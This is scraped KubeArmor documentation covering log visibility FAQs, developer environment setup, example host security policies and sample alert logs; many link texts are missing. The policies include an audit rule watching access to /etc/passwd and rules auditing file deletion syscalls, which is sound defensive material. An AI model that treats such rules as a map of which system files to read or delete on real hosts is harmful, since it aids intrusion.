  "PPID": 168556,
  "PID": 3390423,
  "UID": 1000,
  "PolicyName": "hsp-kubearmor-dev-proc-path-block",
  "Severity": "1",
  "Type": "MatchedHostPolicy",
  "Source": "zsh",
  "Operation": "Process",
  "Resource": "/usr/bin/sleep",
  "Data": "syscall=SYS_EXECVE",
  "Action": "Block",
  "Result": "Permission denied"
}

Here the log indicates that the execution of /usr/bin/sleep by 'zsh' was denied on the host by a Block-based host policy.

The logs are also exportable in .

.

How to visualize KubeArmor visibility logs?

There are a couple of community maintained dashboards available at .

If you don't find an existing dashboard particular to your needs, feel free to create an issue. It would be really great if you could also contribute one!

How to fix `karmor logs` timing out?

karmor logs internally uses the Kubernetes client's port-forward. Port-forward is not meant for long-running connections and times out if left idle. Check out this for more info.

If you want to stream logs reliably there are a couple of solutions you can try:

  1. Modify the kubearmor service in the kubearmor namespace and change the service type to NodePort (see the sketch after this list). Then run karmor with:

karmor logs --gRPC=<address of the kubearmor node-port service>

This will create a direct, more reliable connection with the service, without any internal port-forward.

  2. If you want to stream logs to external tools (fluentd/splunk/ELK, etc.), check out .

The community has created adapters and dashboards for some of these tools which can be used out of the box or as reference for creating new adapters. Checkout the previous question for more information.
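
For option 1, a hypothetical end-to-end flow (assuming the service is named kubearmor in the kubearmor namespace, per the answer above) might look like:

# Change the service type to NodePort
kubectl patch svc -n kubearmor kubearmor -p '{"spec": {"type": "NodePort"}}'
# Find the node IP and the assigned NodePort
kubectl get svc -n kubearmor kubearmor
# Stream logs directly over gRPC
karmor logs --gRPC=<node-ip>:<node-port>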

UEK R7 can be installed on OL 8.6 by following the easy-to-follow instructions provided here in this .

Note: KubeArmor now supports upgrading the nodes to BPF-LSM using . The following text is just an FYI but need not be used manually for k8s env.

The KubeArmor team has brought this to the attention of the on StackOverflow and await their response.

For more such differences checkout .

After this, exit out of the node shell and follow the .

Although there are many ways to run a Kubernetes cluster (like minikube or kind), they will not work with locally developed KubeArmor, because KubeArmor needs to run on the same node where the Kubernetes nodes exist. minikube and kind use virtualized nodes, so KubeArmor will not identify your node. You would either need to build your images and deploy them into these clusters, or simply use k3s or kubeadm for development purposes. If you are new to these terms, the easiest way is to follow this guide:

You can refer to security policies defined for example microservices in .

Watch alerts using cli tool

For better understanding, you can check .

In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .

Block a specific executable ()

Audit a critical file access ()

Note Skip the steps for the vagrant setup if you're directly compiling KubeArmor on the Linux host. Proceed to setup K8s on the same host by resolving any dependencies.

KubeArmor is designed for Kubernetes environments. If Kubernetes is not set up yet, please refer to . KubeArmor leverages CRI (Container Runtime Interface) APIs and works with Docker, containerd, or CRI-O based container runtimes. KubeArmor uses LSMs for policy enforcement; thus, please make sure that your environment supports LSMs (either AppArmor or BPF-LSM). Otherwise, KubeArmor will operate in Audit mode with no policy "enforcement" support.

You can also develop and test KubeArmor on K3s instead of the self-managed Kubernetes. Please follow the instructions in .

You can also develop and test KubeArmor on MicroK8s instead of the self-managed Kubernetes. Please follow the instructions in .

will automatically install , , , and some other dependencies.

Policy Core Reference
Capability List
Consideration in Policy Action
csp-in-operator-block-process.yaml
csp-not-in-operator-block-process.yaml
csp-matchlabels-in-block-process.yaml
csp-matchlabels-not-in-block-process.yaml
csp-in-operator-block-file-access.yaml
ksp-group-1-proc-path-block.yaml
ksp-match-expression-in-notin-block-process.yaml
ksp-match-expression-notin-block-process.yaml
ksp-ubuntu-1-proc-dir-block.yaml
ksp-ubuntu-2-proc-dir-recursive-block.yaml
ksp-ubuntu-3-file-dir-allow-from-source-path.yaml
ksp-ubuntu-3-proc-path-owner-allow.yaml
ksp-ubuntu-4-file-path-readonly-allow.yaml
ksp-ubuntu-5-file-dir-recursive-block.yaml
ksp-ubuntu-5-net-icmp-audit
ksp-ubuntu-1-cap-net-raw-block.yaml
development guide
Testing Guide
this
Support matrix for KubeArmor
KubeArmor Support Matrix
slack
default security posture
GKE COS
Bottlerocket
OpenTelemetry format
Detailed KubeArmor events spec
kubearmor/kubearmor-dashboards
StackOverflow answer
Streaming KubeArmor events
Oracle Blog Post
AppArmor community
Enforce Feature Parity Wiki
getting-started guide
K3s installation guide
examples
karmor
the KubeArmorHostPolicy spec diagram
Capability List
an updater daemonset
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-proc-path-block
spec:
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev
  severity: 5
  process:
    matchPaths:
    - path: /usr/bin/diff
  action:
    Block
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-file-path-audit
spec:
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev
  severity: 5
  file:
    matchPaths:
    - path: /etc/passwd
  action:
    Audit
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: audit-all-unlink
spec:
  severity: 3
  nodeSelector:
        matchLabels:
          kubernetes.io/hostname: vagrant
  syscalls:
    matchSyscalls:
    - syscall:
      - unlink
  action:
    Audit
{
  "Timestamp": 1661937152,
  "UpdatedTime": "2022-08-31T09:12:32.967304Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "HostPPID": 8563,
  "HostPID": 310459,
  "PPID": 8563,
  "PID": 310459,
  "UID": 1000,
  "ProcessName": "/usr/bin/unlink",
  "PolicyName": "audit-all-unlink",
  "Severity": "3",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/bin/unlink /home/vagrant/secret.txt",
  "Operation": "Syscall",
  "Resource": "/home/vagrant/secret.txt",
  "Data": "syscall=SYS_UNLINK",
  "Action": "Audit",
  "Result": "Passed"
}
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: audit-home-rmdir
spec:
  severity: 3
  nodeSelector:
        matchLabels:
          kubernetes.io/hostname: vagrant
  syscalls:
    matchPaths:
    - syscall:
      - rmdir
      path: /home/
      recursive: true
  action:
    Audit
{
  "Timestamp": 1661936983,
  "UpdatedTime": "2022-08-31T09:09:43.894787Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "HostPPID": 308001,
  "HostPID": 308002,
  "PPID": 308001,
  "PID": 308002,
  "ProcessName": "/usr/bin/rmdir",
  "PolicyName": "audit-home-rmdir",
  "Severity": "3",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/bin/rmdir jane-doe",
  "Operation": "Syscall",
  "Resource": "/home/jane-doe",
  "Data": "syscall=SYS_RMDIR",
  "Action": "Audit",
  "Result": "Passed"
}
Vagrant - v2.2.9
VirtualBox - v6.1
$ git clone https://github.com/kubearmor/KubeArmor.git
$ cd KubeArmor/contribution/vagrant
~/KubeArmor/contribution/vagrant$ ./setup.sh
~/KubeArmor/contribution/vagrant$ sudo reboot
~/KubeArmor/KubeArmor$ make vagrant-up
~/KubeArmor/KubeArmor$ make vagrant-ssh
~/KubeArmor/KubeArmor$ make vagrant-destroy
~/KubeArmor/KubeArmor$ make vagrant-up NETNEXT=1
~/KubeArmor/KubeArmor$ vi Makefile
OS - Ubuntu 18.04
Kubernetes - v1.19
Docker - 18.09 or Containerd - 1.3.7
Linux Kernel - v4.15
LSM - AppArmor
$ cd KubeArmor/contribution/self-managed-k8s
~/KubeArmor/contribution/self-managed-k8s$ ./setup.sh
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make
$ kubectl proxy &
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make run
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make deploy
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make docker-build deploy
KubeArmor/
  BPF                  - eBPF code for system monitor
  common               - Libraries internally used
  config               - Configuration loader
  core                 - The main body (start point) of KubeArmor
  enforcer             - Runtime policy enforcer (enforcing security policies into LSMs)
  feeder               - gRPC-based feeder (sending audit/system logs to a log server)
  kvmAgent             - KubeArmor VM agent
  log                  - Message logger (stdout)
  monitor              - eBPF-based system monitor (mapping process IDs to container IDs)
  policy               - gRPC service to manage Host Policies for VM environments
  types                - Type definitions
protobuf/              - Protocol buffer
pkg/KubeArmorController/  - KubeArmorController generated by Kube-Builder for KubeArmor Annotations, KubeArmorPolicy and KubeArmorHostPolicy
deployments/
  <cloud-platform-name>   - Deployments specific to respective cloud platform (deprecated - use karmor install or helm)
  controller              - Deployments for installing KubeArmorController alongwith cert-manager
  CRD                     - KubeArmorPolicy and KubeArmorHostPolicy CRDs
  get                     - Stores source code for deploygen, a tool used for specifying kubearmor deployments
  helm/
      KubeArmor           - KubeArmor's Helm chart
      KubeArmorOperator   - KubeArmorOperator's Helm chart
examples/     - Example microservices for testing
tests/        - Automated test framework for KubeArmor
hsp-kubearmor-dev-proc-path-block.yaml
hsp-kubearmor-dev-file-path-audit.yaml
Kubernetes installation guide
K3s installation guide
MicroK8s installation guide
setup.sh
BCC
Go
Protobuf
here
KubeArmor High Level Design
fork button
fork screen
fork repo
commit ahead
after pull request
open pull request